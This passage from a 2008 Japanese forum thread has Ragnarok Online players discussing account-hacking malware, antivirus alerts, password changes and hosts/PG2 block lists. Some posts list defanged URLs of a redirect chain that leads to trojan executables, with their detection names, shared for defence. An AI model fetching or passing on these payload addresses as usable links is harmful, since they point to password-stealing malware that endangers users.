そのファイルがなくなっていた）

ほかのPCから移動させたら起動しましたがログインはせずに
いったん落としてからカスペルスキーでオンラインスキャンをかけました。
レポートでは検出されずになっていましたが何が原因で消えたのか
わからないため諦めてOSの再インストールしたほうが安全でしょうか？

502 ：（○口○*）さん sage ： 2008/05/07(水) 18:00 ID:kBn2V8vE0

XP SP3は結構時間掛かるな
環境にも依るんだろうけど大体15分くらい掛かった
焦らず時間があるときにやった方が良いかもね

あと、他所での書き込みで USBメモリとか USBに接続する物を差しっぱなしに
していたら失敗したとあるから全部抜くのがよさそう

ウイルス対策ソフト等の常駐ソフトも全部解除しないと失敗することがあるっぽい

#まぁ、基本的なことだけど念のため

503 ：（○口○*）さん sage ： 2008/05/07(水) 19:28 ID:SumLri7e0

あと、余裕がある人はSP3統合CDを作成して、クリーンインストールするとゴミが少なくて済むのでお薦め。
手順などは、検索すればいろいろ出てくるので割愛。

504 ：（○口○*）さん sage ： 2008/05/07(水) 20:34 ID:jQn4GTun0

>>499
グーグル以上の情報は無いか。レスありがとう。

505 ：（○口○*）さん sage ： 2008/05/08(木) 13:41 ID:ObvtjvsS0

>>501
原因はｼﾗﾈ
パッチ当てに失敗しただけかもしれない

ゲームファイルが壊れた場合は他のPCから持ってくるんじゃなくて、必要なファイルのバックアップ後に
ROのアンインストール及びGravityフォルダの完全削除をしてRO再インストールをお勧めする

絶対に安心したいならOS再インストールだね

506 ：（○口○*）さん ： 2008/05/08(木) 20:26 ID:SZwHj+Ib0

お尋ねしたいのですが、今日ネカフェからchaos GvG historyを見て、
神器・ボスレア所持者一覧のページから
『逆引きはこちら→「神器・ボスレア簡易まとめ」』のURLを踏んだところ、
ネカフェのウイルスソフトが作動して、脅威が検出されました、と出たのですが、
これは垢ハックのサイトを踏んでしまったのでしょうか？？
飛んだ先は普通のブログで上に書いてある内容とは全く関係ないと思われる
ものだったので不安に思い、相談してみました。

ちなみにその飛ぶ先のURLは
ttp://world2001■blog39■fc2■com/
です。
自分にパソコンの知識がほとんどないのでよろしければ詳しく教えてもらえるとうれしいです
。

507 ：（○口○*）さん 突っ込みどころは「ウイルスソフトが作動」sage ： 2008/05/08(木) 20:51 ID:eJm6dd/J0

>>1

508 ：（○口○*）さん sage ： 2008/05/08(木) 21:16 ID:YS/1Dcn50

>506
初心者なら尚さらテンプレ使おうな。

で、>507（のメル欄）のいう通りで、罠を踏んでる。
よくあるサイズ０のiframeの罠。
防いでると思うが、防げてない可能性もある。

テンプレに沿ってくれんと何をやったか（ROへのログイン等含む）分からんし
安全な環境でPASS替えて来い、としか言えんよ。

509 ：（○口○*）さん sage ： 2008/05/08(木) 21:27 ID:YS/1Dcn50

ところで最近は(>506含めて)短縮URLで仕込みに来てるケースが
多いように思えるんだが、実際のところ短縮URLを有効活用してる
例ってあるんだろうか？

hostsに短縮URLサービスそのものを危険アドレス扱いで登録した方が
いいんじゃないだろうか？と提案してみる。

俺個人は既にそうやってて困ったことは一度もないけど、それで困る人って
いるのだろうか？
短縮URLサービスって中華系しか使ってないように思えて仕方が無い。

510 ：（○口○*）さん sage ： 2008/05/08(木) 21:32 ID:coUUZVA90

まぁ、こんな感じで呼びだされて、既知のアカハックトロイを落としてくる訳ですが。

ttp://world2001■blog39■fc2■com/
ttp://tinyurl■com/6722xv
ttp://www■panslog■net/wiki/index1■htm
ttp://www■teamerblog■com/wiki/cer■exe

index.htm : HTML/Infected.WebPage.Gen(AntiVir)
index.htm : Trojan-Clicker.HTML.IFrame.il
index1.htm : Trojan-Downloader.JS.Agent.brl
cer.exe : Trojan-PSW.Win32.OnLineGames.wmz / Trojan.Win32.Inject.ama

511 ：（○口○*）さん sage ： 2008/05/08(木) 21:33 ID:coUUZVA90

>>509
イベント系サイトの宣伝で、PT名等に収まるように利用してたな。
転送url自体のブロックは過剰防衛じゃないかって気がするよ。

512 ：（○口○*）さん sage ： 2008/05/08(木) 21:39 ID:coUUZVA90

>>510
総合スレに報告されてた事例そのまんまだったわ

アカウントハック総合対策スレ9
ttp://gemma.mmobbs.com/test/read.cgi/ragnarok/1195956271/652

513 ：まとめ臨時 ◆kJfhJwdLoM sage ： 2008/05/08(木) 21:48 ID:9+Qewj5i0

>>506
テンプレは>>1-7
相談する場合は >>4 を使用するとレスが付けやすくなります。
とりあえず感染したPCではROに限らず、
パスワードを使用(利用)する操作をしてはいけません。

ネカフェからの接続との事ですので、
直ぐに自宅PCでパスワードを変更できればベター。
自宅にPCが無いネカフェのみのRO接続利用者なら
別の席に変えてもらってパスワードを変更…と行きたい所ですが
替えてもらった席も安全かどうか判らないので…
カスペルスキーオンラインでフルスキャンした後で
何も見つからなければその場で変更出来なくも無いですが不安材料が多いですね。


ところで携帯端末でそこからPASS変更とかできるのでしょうかね…
それよりネカフェでウイルスを踏んでしまった場合、
PCにリセットが掛かるような所ならまだ安心できそうですが
そのまま接続されているような所だと二次被害が広がりそうな気がします。

514 ：506 ： 2008/05/08(木) 21:58 ID:SZwHj+Ib0

みなさんご返答ありがとうございました。
とりあえず席は移動してパスは変えたのですが、
自宅に帰ったらもう一度変更してみようと思います。

店員に聞いたみたところ、再起動の際にリカバリーはされるみたいなので
ＰＣは落とせば平気と言われました。
テンプレにそった形で質問ができなく申し訳なく思います。
ありがとうございましたm(_ _)m

515 ：（○口○*）さん sage ： 2008/05/09(金) 00:07 ID:+rPZuNDF0

広告やブラクラと言った禄でもないのばっかりだから転送URLを全て
あぼ〜んする設定にしてるが特に困ったことはないな

516 ：（○口○*）さん sage ： 2008/05/09(金) 00:08 ID:8dJ6/kSI0

オンラインゲーム関連の不正活動に注意、トレンドマイクロ4月レポート
http://internet.watch.impress.co.jp/cda/news/2008/05/08/19473.html
http://jp.trendmicro.com/jp/threat/security_news/monthlyreport/article/20080508025143.html

517 ：（○口○*）さん sage ： 2008/05/09(金) 01:17 ID:d0E7e5AC0

>514

>とりあえず席は移動してパスは変えたのですが、
ネカフェでアトラクションセンターにログインした？
念のため、家でガンホーIDのパスも変更しておくんだ。

518 ：（○口○*）さん sage ： 2008/05/09(金) 05:38 ID:auXJkYq10

かつては、紙媒体などでの表記スペースの都合や、手入力の手間、サイト移転時のアドレスの一意性などで転送/短縮URIサービスが
持て囃されていたが、今ではいくらでも代替手段が出てきたから。

媒体への表記はQRコードが主流となり、それ以外でもアドレスバーへの日本語キーワード直接解釈により、そもそもアドレスを入力する
必要が無くなった。むしろ、短縮URIのtypoや誤記により、悪意あるサイトへ転送されるリスクも警戒する必要がある。
アドレスの一意性は、独自ドメインの取得が容易になった事により、自己証明としても一般化しつつある訳で。

519 ：（○口○*）さん sage ： 2008/05/09(金) 20:19 ID:hWx6css50

すいません。どこで踏んだか不明なんですが
先日カスペでスキャンをしたら
Trojan-PSW.Win32.WOW.elと言うトロイが発見されました。
今削除をしたのですが、これは垢ハックウィスルですか？
削除したのでパスなど変えて大丈夫でしょうか？初歩的な質問ですいません

520 ：（○口○*）さん sage ： 2008/05/09(金) 20:26 ID:92Sp0lN/0

>>519
http://www.viruslistjp.com/viruses/encyclopedia/?virusid=130036
他に何紛れてるかわからないから安全とは言えません
万全期したかったら再インストールどうぞ

521 ：（○口○*）さん sage ： 2008/05/09(金) 20:42 ID:hWx6css50

>>520
回答ありがとうございます
垢ハックウィルスみたいですね。カスペで検知後削除して、その後またスキャンをしたけどもう検知はされませんでした
でも不安なんで520さんの言うとおり再インストールします。

522 ：（○口○*）さん sage ： 2008/05/09(金) 23:51 ID:PI7MYOBb0

質問はこちらのスレでよろしいのでしょうか。
先日感染した知り合いからメッセで送られてきたものです
ソースチェックの方法がわからないのですが、
下記URLにはどんなものが仕込まれているのでしょうか？

ttp://kaede740■cache3■real■awes0mestuff■info

523 ：（○口○*）さん sage ： 2008/05/10(土) 00:00 ID:/nSobnaS0

XPのSP3がきたおかげでリカバリしやすくなったな。
今までのセキュリティパッチはSP3に入っているから
長ったらしいWindowsUpdateも短縮できるぜ。

524 ：まとめ臨時 ◆kJfhJwdLoM sage ： 2008/05/10(土) 00:13 ID:JEeJhIbe0

>>522
ソースチェッカーオンライン( http://so.7walker.net/guide.php )で
所定のURLを貼り付けてcheckをクリック。

インラインフレームの存在や記載されているURL、
ドメインの所在地やソース自体の記述内容で
おおよそですが判別できたりします。

試しにかけてみた所、"ドメインウェブの設定が見つかりません"とのこと。
既に消されているのか設定が間違っているか反映されていないのか
こちらでは確認は取れません。
怪しいと思うならリンク先に飛ばないほうがよろしいかと。

525 ：まとめ臨時 ◆kJfhJwdLoM sage ： 2008/05/10(土) 00:33 ID:JEeJhIbe0

5/8付でリネージュ資料室さんで
提供されているPG2リストとhostsファイルですが、
失効したドメイン等を整理して削除したとの事です。
PG2でのドメイン失効分の反応が緩和されるみたいですね。
資料室さん選別作業本当にお疲れ様でしたありがとうございます。

hostsファイルリストも削除された件数がかなりありますので
最新版のリストに差し替えてもいいかもしれません。


ただhosts分をスクリプトで自動取得している場合は
資料室さんの最新のhostsファイルを取得している場合、
削除されているドメイン分をまとめ臨時側のほうで
改めて取得しなおしてしまう問題が発生してしまうかも知れません。

526 ：（○口○*）さん sage ： 2008/05/10(土) 10:19 ID:QOr/iN7p0

>525
別に問題ないんじゃない？
失効した罠ドメインを別の所が取得して、ユーザーがそこにアクセスする必要が
出る事ってまず無いだろうし。

もしそういうケースが出たとしても、スクリプトの方で除外設定リスト作れば
リストから省かれる。
もし残骸がまとめ臨時側に残ってたとしても、それを邪魔と思わなければ
何ら支障はないかと。

527 ：（○口○*）さん sage ： 2008/05/10(土) 18:22 ID:XRpdAeRmO

初カキコです。
昨日ログインしようとログインパスを入力した所
1回目:わざと違うパス入力したら10秒位後に｢パス違います｣と出現
2回目:正確なパス入力後すぐにサバキャン
3回目:正確なパス入力後すぐにサバキャン

となりました。
一応ノートンでスキャンしたところ何もありませんでしたが、上記のようなことってたまに起きるものなのでしょうか?それとも…

最近一部サイトが火狐だと見れなかったり(何故か常時更新される。IEだと閲覧可)するのでちょっと不安になって…。
再インストールが一番とは思いますが、よろしくお願いします。

528 ：（○口○*）さん sage ： 2008/05/10(土) 18:57 ID:A4zomGQc0

さっぱりわからん、どうしたらいい？

529 ：（○口○*）さん sage ： 2008/05/10(土) 20:03 ID:X6Lrupm50

>>527
何故わざと違ったパスを入れたのか謎ですが

前に、パスワードを３回くらい入力ミスったら、
それ以降“入力→Enter押した瞬間に鯖缶表示”という現象になったことはあるけど、
その時は一旦クライアント落として、少し待ってからクライアントを再起動したら入れるようになった。
(現象が出たのはサブＰＣで、メインＰＣはログイン出来ていたので鯖落ちということではなかったはず)

何回かミスったらログインを弾くようにするという仕様があるのかと思われるけど、
１回ミスでそういう現象が出たことはないかな(クライアントの誤認識？)

気になるなら再インストが一番かも。
最終的な判断はご自身で。

尚、火狐の件は使ってないので何とも言えません。

530 ：まとめ臨時 ◆kJfhJwdLoM sage ： 2008/05/10(土) 20:14 ID:W5l7IrpB0

>>526
突っ込みありがとうございます。除外リストの機能があるのですね。
幸い資料室さんのほうでは削除分も更新履歴に記載されますので、
残骸分は要らないなあと言う方の場合はそれを使用してもらうということで…。

>>527
あいまいすぎるので私見で。

一回目は単にログインサーバーが重かっただけかもしれませんし、
二回目と三回目の件は何回かログイン失敗した後で、
リターンキーの決定でログインしようとすると
「サーバーからキャンセルされました」と表示される事があるみたいです。
(loginボタンをクリックなら起こらないみたい？
　厳密にチェックしたわけではないのであまり信頼性がないです)

とりあえず現状普通にログインできるのであれば問題ないと思われます。

ウイルスとか何かの可能性を疑うのであれば
テンプレ >>1-7 熟読の上
カスペルスキーオンラインスキャンでフルスキャンしてみて、
それでウイルスの可能性がないのであれば
"ROアカウントハック報告スレのまとめサイト"等を読んで
PG2を導入してPG2が変な所をブロックしていないか確認してみてください。

気になるのは一部サイトが見られないとの記述ですが
見ようとしている、常時更新される場所がどこなのか書いていないので
今ひとつ的確なレスが返ってこないように思われます。

531 ：（○口○*）さん sage ： 2008/05/10(土) 22:58 ID:XRpdAeRmO

返信ありがとうございます。

わざと違うパス入力したのは以前どこかのブログかスレでアカハックされた方が｢パス入力後すぐにサバキャンになった｣と言っていたので、なんとなく初回は違うパス入力をしています。それで今回自分もサバキャンになったのでカキコさせていただきました。

一部サイトとはラグナ関係ではRoratorioやRO2です。またラグナ関係ではない一般サイトも同じ現象が起きました。(現象が起きるサイトではIEでは閲覧可。また右クリックでタブで開く場合も閲覧可)特にPG2は反応してかなかったと思います。
詳しく書きますと
RO2ではトップページは開けるものの、左のモンスター情報などをクリックしてもページが飛ばずにトップページに戻る
ある一般サイト(PDFファイル)は常時更新で繰り返し同じページを開こうとして表示されません。
分かりにくかったらすみません;;
帰宅後カスペルスキーをやってみます

532 ：（○口○*）さん sage ： 2008/05/11(日) 01:09 ID:Bbsasygc0

別ゲーですが、FPSのWarRockというFPSーと、あと同じ会社の別ゲーの公式サイトがクラックされ、
トロイが仕掛けられたそうです。
ちなみにこのWarRock、去年も5月に公式がクラックされたことが・・

533 ：（○口○*）さん sage ： 2008/05/11(日) 03:44 ID:c0oPRYV0O

最近はカスペも微妙になってきたからほかのメーカーでもスキャンしたほうがいい

534 ：（○口○*）さん sage ： 2008/05/11(日) 12:33 ID:HLQa104d0

>>533
Kasperskyの他っつーとAntiVirくらいしかないけどね。

535 ：（○口○*）さん sage ： 2008/05/11(日) 12:51 ID:HLQa104d0

>>532
www■ririwow■cn bbs■jueduizuan■com
→ www■bluell■cn/ri.exe dj■jueduizuan■com/ri.exe
ttp://www.virustotal.com/analisis/9c675a56d3c8dfef9b72c80d8577b76c

536 ：（○口○*）さん sage ： 2008/05/11(日) 12:51 ID:mM9Xdi4o0

>>533
○○は微妙 と言うなら、理由まで書くもんだぜ。
プロアクティブディフェンスが重たいとか、理由はあるだろ。

カスペに限らず、複数のエンジンで確認する方が安全性が高い（PCの能力が余計に必要）なのは当然だが。

537 ：527 sage ： 2008/05/11(日) 12:57 ID:caj4vjqcO

昨日はありがとうございました。

一応Cドライブをフォーマットして入れ直しました。
しかし再びソフト入れ直してたらまたサイトが見れない現象が起きて、もしかしてskypeかなとアンインストールしたら正常にサイトが見れるようになりました

538 ：（○口○*）さん sage ： 2008/05/11(日) 13:05 ID:HLQa104d0

なんか勘違いしてそうだなぁ

539 ：（○口○*）さん sage ： 2008/05/11(日) 18:44 ID:mM9Xdi4o0

>総合スレ9-664
雑談はセキュスレに移動しろってばよー
そんなことやってっと誘導BOTが動きだしちまうじゃねーか

540 ：（○口○*）さん sage ： 2008/05/11(日) 18:53 ID:/MUlVl3K0

「アカウントハック総合対策スレ」だからなあ
「対策」と入ってれば対策について話もしたくなるだろう
いくらテンプレに
>一般的なセキュリティ対策・相談・雑談はLiveROの雑談スレ(通称 セキュスレ)を利用して下さい。
とあってもな

次スレ立てる時は
「アカウントハックアドレス収集スレ」
にでもしてほしい

541 ：（○口○*）さん sage ： 2008/05/11(日) 19:07 ID:J/SSaMba0

向こうは次スレ要らんと思うが。
全部このスレでやればいいんじゃね？

542 ：（○口○*）さん sage ： 2008/05/11(日) 19:17 ID:L5P0zASf0

同意、なんて名目でスレ立ててもあの誘導中は消えないと思うぜ
こっちで全部請け負った方が楽、というか現状そんな感じだし

543 ：（○口○*）さん sage ： 2008/05/11(日) 19:17 ID:/MUlVl3K0

予防・駆除・事後連絡
役に立つのはどう見てもこっちのスレだしな
向こうは秋ぐらいまで次スレ立たなさそうだし

個人的には、こっちはRO板に移してもいいような気がする
なんで蓄積されないらいぶろなんだと

544 ：まとめ臨時 ◆kJfhJwdLoM sage ： 2008/05/11(日) 20:02 ID:m4cMuFaK0

bluellでググると
まったく関係なさそうなカメラ販売店？とかが上位にあったり。
クラックされているのかなあ…とか。

>>532 >>535
jueduizuan、ririwow、bluellをリストに加えました。

545 ：（○口○*）さん sage ： 2008/05/11(日) 20:37 ID:fDokFImD0

アドレス収集だけなら、わざわざスレでやる必要はないしな。逆にリスクもある。
向こうのスレは、1スレが出来た当時と状況が変わり過ぎて、そろそろお役御免でも良い希ガス。

>>543
RO板だから蓄積される、LiveROだから蓄積されないという考え方も、決して良いとは思えないな。
それだけだと、MMOBBSに役目を押しつけ過ぎ。
このスレがLiveROに別建てとなったのも、当時★持ちの手が回らなく、次スレ移行遅延が多かったのも無関係ではないのも含め。
RO板のログが最終的に保存されていたragcanも、廃止された結果古いログは大幅にロストしているし。
重要なのは、個人やまとめサイトでのdat保存になるかと。


そしてWarRock公式改竄の話。
ttp://www.lievo.jp/03news/news_detail.asp?spage=300
ttp://www.lievo.jp/03news/news_detail.asp?spage=301
>・共通の告知システムを利用しているコンテンツサイトが改竄され、
>　告知文に中国の悪意のあるサイトへのダウンロードリンクが挿入された。
中国名指しで記述される告知内容。こんなところでもチャイナリスクの増大が目に見えてきた訳で。

おまけ↓
341 名前：既にその名前は使われています[] 投稿日：2008/05/11(日) 16:06:21.05 ID:ph4QmOBI
罠カキコ掲示板の中華：yh33dddがここ数日の間にあちこちのゲーム以外のサイト、
コミュニティ等に潜入したのをGoogle検索で確認。
先日はFC2ブログのユーザーフォーラムにウィルスリンクを多数書き込んだ。
MSDNフォーラムにもこの名前で潜入、ウィルスリンクを記述している
ttp://forums.microsoft.com/MSDN-JA/ShowPost.aspx?PostID=3248358&SiteID=7
気をつけてくれよな！

546 ：（○口○*）さん sage ： 2008/05/12(月) 07:59 ID:An08lB8R0

ハクスレの方、スレスト依頼＆統合スレ建ての依頼でもした方がいいのかねぇ？
是非スレで聞いた方がいいのかな？

547 ：（○口○*）さん sage ： 2008/05/12(月) 08:21 ID:164nzibb0

是非スレの前にはまず該当スレでの話し合いが必要。
こっちでの結論も出てない状態でスレ見てない板住人を巻き込んでも仕方ない。

個人的な意見としてはこのスレがRO板にあれば十分。
だけど向こうのスレを無くす事に反発する人も居るだろうから
公知書き写すスレと突っ込みスレのような関係になるのが無難だと思う。

548 ：（○口○*）さん sage ： 2008/05/12(月) 08:24 ID:QUUWDs370

＞該当スレでの話し合い

そんなことしたら速攻で「重要な(ry」と「nice bot.」が湧くのが手に取るように見えた…

549 ：（○口○*）さん sage ： 2008/05/12(月) 08:44 ID:XkMaAnwM0

一回向こうで書いてみて重要な〜とか言ったらこっちで勝手に決めちゃえばいいじゃない

そうすればここで出した結論が向こうとこっちの統一意見って事になるわけだし
向こうで話し合いに乗ってくるならそれはそれで問題ないわけだし

それとも先にこっちの結論を出しちゃってから向こうに書いた方が楽かな？

550 ：（○口○*）さん sage ： 2008/05/12(月) 08:48 ID:164nzibb0

それについては以前にも書いたことあるよ……。
スレの運営自治に関して自スレ内で話し合いが出来ないなんておかしいだろと。
2つのスレは立ち位置の違う別スレなんだから、本来向こうの自治は向こうで話合うべきなんだよな。
とりあえず546の投げかけに対してのレスだし、重要な(略を釣るつもりもないからこっちに書き込むけど。

551 ：（○口○*）さん sage ： 2008/05/12(月) 09:06 ID:CTHEVXtC0

あのスレを利用している(検体報告とかやってくれている)人の意見も聞いてみたいところだな
個人的には検体報告は埋もれやすいから別で、というのも分かるし
ただあそこにある必要はない
アンチウイルスベンダーに報告してしまえば検体報告はいらないし
(結果報告はいるだろうが、元は取ってあるはずだから過去のレスはあえて不要)
スレが落ちたら都度立てればいい内容
むしろスレ落ちするぐらい利用がない方がいいんだろうな

向こうは事例報告しか許さないようになってしまっているから
ちょっと話を振ってみて、重要な(ryが来たらこっちで話をまとめてしまえばいい
自分たちの存在意義についての話さえ雑談として許さないなら
自治は無理だろう
それが出来るなら両方である程度話し合って是非スレ移行、
出来なければこちらである程度結論出して是非スレ移行

552 ：（○口○*）さん sage ： 2008/05/12(月) 10:14 ID:HcevU4aq0

ハクスレ２ぐらいから常駐してて、urlチェックが主、極まれに検体チェックで報告してる身として。

専ブラ使ってるからってのもあるが、どちらも同時に巡回してるしスレがどちらの板にあっても
気にならないが、今のハクスレは機能不全にさせられてるし統合に賛成。

統合前提として、どちらの板に置くかと考えた場合
-RO板
--全般を取り扱う場合は板違いの可能性有り
--是非スレで了承を得る必要があるが、nice bot.の妨害が来る可能性有り
--職スレがある関係上、割と安心して板みる人が多い（らしい？）
--dat落ちせず、多少過去スレが見やすい
-LiveRo
--板違いにはなりにくく、融通が利くので即建てる事も可能
--LiveRoを嫌う人もいる（らしい？）
--dat落ちするぐらい過疎る方がスレの性質上望ましい
--過去スレを見る必要が実は薄いので、ログ保存はそんなに重要ではない

そもそもセキュスレが出来た経緯ってのは、ハクが激しかった時期に雑談系の話題で
スレが流れてしまい、危険アドレスの情報を見落としやすくなったのと全般ネタをやると
板違い気味になって来たから。
（WUの話なんかもハクスレでやってたが、FWだのなんだのの話になるとRO板の範疇を
超えた話題になりがちだった）

板違いの問題がないならRO板、あるならLiveRoじゃないかな。
手続き的なものやら何やら手間考えると、LiveRoの方がいい気がしてるけど。

553 ：（○口○*）さん sage ： 2008/05/12(月) 12:25 ID:J8sL+PS30

＞是非スレで了承を得る必要
垢ハクスレでテンプレ変更議論→賛成多数で了承を得る
→新テンプレでスレ立て依頼
という流れだと思うよ。

新規スレとして是非スレに持ち込んでも
「既存スレ（垢ハクスレ）との重複」で反対が起きるだろうし
統合スレという目的である以上はそれに対して筋通すことはできないからね。

554 ：（○口○*）さん sage ： 2008/05/12(月) 12:33 ID:H3fB1Bet0

向こうのスレに重要な〜がいなければしっかりとした話し合いが出来ると思うんだがな……
荒らしもいいとこだろあれ

個人的な見解としては、
情報が流れてしまう問題はわからんでもない
が、見落とすほどに荒れたりレスが続くかといわれるとそうは思えない
こっちに報告されて向こうに反映されない情報もあるわけで情報の片手落ちはよろしくない
統合の検討はすべきだと思う

555 ：（○口○*）さん sage ： 2008/05/12(月) 12:34 ID:QUUWDs370

検体報告する人はコテ酉付ければいいんじゃね
それ抽出すれば「重要な(ry」が参照できるだろ

556 ：（○口○*）さん sage ： 2008/05/12(月) 13:38 ID:CTHEVXtC0

>>553
うん
だから、向こうで自治が出来るのかって話
テンプレ変更議論すらこっちに持ち込まれそうじゃない？
重要な(ryを荒らしとしてスレ住人で排除できるならいいんだけど
それが分からないからどこでどう話をしようかと言ってるのだと思った

557 ：（○口○*）さん sage ： 2008/05/12(月) 13:50 ID:nbJ4k4Do0

★でもないただの名無し相手にスレが振り回されてておもしれーｗ
相手からすればちゃんと自治をしているつもりだろうよ

558 ：（○口○*）さん sage ： 2008/05/12(月) 14:11 ID:J8sL+PS30

>>556
是非スレに持ち込むべきではないっていうのが趣旨だったんだけど
とりあえずその部分はおｋ？

テンプレ修正議論に誘導レスされてもそれはスルーでいいんじゃないかな。
該当スレで議論するのが筋だし、誘導レスが酷いならかえって
削除依頼する正当な理由になる。
そもそもテンプレ議論はこれに該当しないしね。
＞一般的なセキュリティ対策・相談・雑談はLiveROの雑談スレ

もっともそれはRO板で統合する方向性になったときの話で、
まだ方針すら定まらない現段階ではここでいいと思う。
あくまで、是非スレに持ち込むような話にまでこぎ着けたら
垢ハクスレがいいってこと。

ただ、LiveRO側で統合って話になったときにRO板垢ハクスレを
どうすればいいのかはわからない。
是非スレは（少なくとも現時点では）スレ廃止を議論する場でもないし
かといって板のトップに誘導リンクがある以上は放置もできない。
管理板行きになるのかな・・・？

559 ：（○口○*）さん sage ： 2008/05/12(月) 14:21 ID:J8sL+PS30

ごめん、リンクはこっちになってたね。
それならLiveRO側統合の話になったら放置（関与せず）でよさそう。

560 ：（○口○*）さん sage ： 2008/05/12(月) 14:33 ID:XkMaAnwM0

>>558
その場合、垢ハクスレについては管理人さんにスレスト依頼をすればいいんじゃない？
誘導を一言だけ書き込んでおけば放置しておいても問題はなさそうな気もするけど

これを書いてる時に改めてみてみたらTOPからリンクを張られてるスレって垢ハクスレじゃなくてこのスレなんだね
垢ハクスレは情報を得るという点では本当に要らないんだな

とりあえず、今も前スレへのリンクになってるしTOPの更新は何か対策を考えた方がいいかもしれない・・・
よし、ここはひとつこのスレの中から誰か一人管理人さんに立候補するんだ！

561 ：（○口○*）さん sage ： 2008/05/12(月) 15:06 ID:GlvYeIRL0

>>560
セキュスレが更新されたら、管理スレの目安箱に投稿すれば書き換えてくれるよ。
前も、そうやって修正お願いしたし。

562 ：（○口○*）さん sage ： 2008/05/12(月) 15:28 ID:GlvYeIRL0

MMOBBS目安箱2
http://zaurak.mmobbs.com/test/read.cgi/manage/1164226754/154

｜154 (＞▽＜)さん sage 08/03/20 23:47 ID:O718UGX00
｜アカウントハック総合対策スレ
｜>アカウントハックに関する情報の集積・分析を目的とするスレです。
｜>被害や攻撃等のアカウントハックの具体的事例に関して扱います。
｜
｜セキュリティ対策、質問・雑談スレ
｜>・ウイルスソフトやスパイウェアチェックソフトなどの一般的な質問。
｜>・アカウントハック対策に関しての討論など。
｜>・セキュリティ関係の最新情報、ニュースなど。
｜>・アカハックを踏んでしまった/アカハックと関係のないものを踏んでしまった時の相談
｜
｜こんなアカウントハックがあった、なら前者、
｜ではどうするかとかセキュリティ関連の話題なら後者
｜前者は研究室、後者は会議室・教室
｜学術的研究にとどめるべきだという人と、広くセキュリティ意識を高めてもらおうという人とで
｜意識のずれが見られるんじゃないかと思う
｜実害のあった事例についていちいち移動するのかという考え方も出来るしね
｜セキュリティ情報をらいぶろに埋めていていいのかという懸念も分かる
｜
｜テンプレ見直しすらしづらい雰囲気なので、話し合うならセキュリティスレで

テンプレ変更のことって、結構前に、話題に出てるんだよなー

563 ：（○口○*）さん sage ： 2008/05/12(月) 20:02 ID:TfYn3UNn0

スレの位置付けの明確化を目的としたテンプレ改定は何度も案として
上がってるが、スレの位置付けは今のままでいい、テンプレも変える
必要はない、と言い張る人も居て全然進まず、２スレぐらい進んでる。

セキュスレ的には今のところ統合に賛成する声が主だが、その場合板は
どちらがいいと考えてる？

個人的には>552の言うようにRO板だと板違いの部分があると思うから
LiveROの方がいいと思うんだが。

564 ：（○口○*）さん sage ： 2008/05/12(月) 20:27 ID:GlvYeIRL0

RO板に持ち込むのは無理だろう。一般的話題は板違いだから。

ぶっちゃけ、体験談の報告が、RO板に移動すればそれで十分なんだけどな〜

当初、スレ分割した時の予想ほど、まとめてRO板にフィードバックする作業をする人がいなかったのが
総合スレ不要案の根底にあるんだろうね。

565 ：（○口○*）さん sage ： 2008/05/12(月) 20:38 ID:J8sL+PS30

>>564
＞一般的話題は板違い
そこはLiveROも大差ないよ。

＞MMORPG「Ragnarok Online」(以下RO)に関する話題を取り扱う匿名掲示板です。
＞LiveRO板はRagnarok Onlineに関する話題の掲示板です。

だからRO板がダメならPUB行けってことになると思う。
専ブラ促進のスレがRO板にあることだしあんまり気にしなくていいんじゃない？

566 ：（○口○*）さん sage ： 2008/05/12(月) 20:39 ID:9P1KBmSe0

全てを板で完結させようという事自体が、無理があると思う気がする。
こちらのスレに書かれた体験談を向こうに転記しても、やはり一過性の記述になってしまうから。
本来、そういうのはWikiやまとめサイトの領分だと思うのだけどな。

向こうのスレで現在機能している、不審サイトのURL掲載にしても、ノイズが増えたり、増やされたりしたらやっぱり調査の手間が増える訳で。
それこそ、業者が意図的にハックとは無関係のアドレスを爆撃して、妨害してくる可能性だって考えられる。
そういった場合の対処を、★持ちだけに投げてしまうのもどうかと。

567 ：（○口○*）さん ： 2008/05/12(月) 22:41 ID:LFsnUrdc0

パーティー設定 - 経験値の分配方式 : 各自で取得
○○: ウィンドウが次々と
○○: でてくるやつ
○○: なっちゃってさ
××: エロサイトでもみたの？
○○: ちがうよ・・
△△: おつかれさまー(ﾟωﾟ*)
△△: おやくそくのー
○○: ROの公式サイト
○○: みてて
○○: クリックしたら
○○: でてきて
○○: びっくりした・・
取引ができました。
赤ハーブ 6 個獲得
食人植物の根 3 個獲得
食人植物の花 4 個獲得
ベトベトな毒 6 個獲得
かまきりの手 33 個獲得
乾いた砂 16 個獲得
ドロの塊 11 個獲得
ハリネズミの針 2 個獲得
獣の皮 1 個獲得
エメラルド 1 個獲得
××: 公式でも
速さが減少しました。
ブレッシング状態が解除されました。
××: 信用したらだめｗ


というログが取れたんだけど公式サイトって危ないです？

568 ：（○口○*）さん sage ： 2008/05/12(月) 22:45 ID:GlvYeIRL0

他ゲームの公式サイトに、罠が仕込まれて中国の危険サイトに接続するようになった事例は存在する。
だが、それとブラクラは別物。公式の他に、ブラクラ仕込まれてるどこか踏んでたんだろ。

569 ：（○口○*）さん sage ： 2008/05/13(火) 10:07 ID:cZQtvkY6O

以前忍者ブログを作成したとき、QRコードの部分にリンクなんてつなげてないのに、なにかつながっていたようでクリックしたらブラクラだった事がある。
あれは一体…

570 ：（○口○*）さん sage ： 2008/05/13(火) 11:36 ID:qlcwVDtb0

この手のスレに書くなら、もー少し落ち着いて情報を
揃えて欲しいかなぁ。そうでないなら、愚痴スレチラ裏スレとか。

571 ：（○口○*）さん sage ： 2008/05/13(火) 15:12 ID:PM7UqPyR0

向こうのｽﾚに書くと多分また例のが出てくるからこっちに

なんか福建竜安も久しぶりに見たなぁ……

572 ：（○口○*）さん sage ： 2008/05/13(火) 16:42 ID:3myvFwcF0

使い分けわかってなくて、垢ハクの方に書いちゃったことなんだけど

新しいブログパーツって、パーツ貼ってるところにランダム訪問だから、
罠blog踏んじゃう可能性高くなって危なくないかなって、思いました。

573 ：（○口○*）さん sage ： 2008/05/13(火) 17:50 ID:LUduKEei0

飛びまくってしまった　俺はもうだめかも試練

574 ：（○口○*）さん sage ： 2008/05/13(火) 17:53 ID:ur/QvIyB0

FlashPlayerが更新されてる(9.0.124.0)。IEは
ttp://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash
を踏めばよい。他は知らん。

575 ：（○口○*）さん sage ： 2008/05/13(火) 17:54 ID:u8ZeN/4E0

まぁ俺も飛んだが……
なんかやけに新しく作られたブログが多いんだよな
サクラならまだいいが垢ハックブログの可能性もありえそうではある

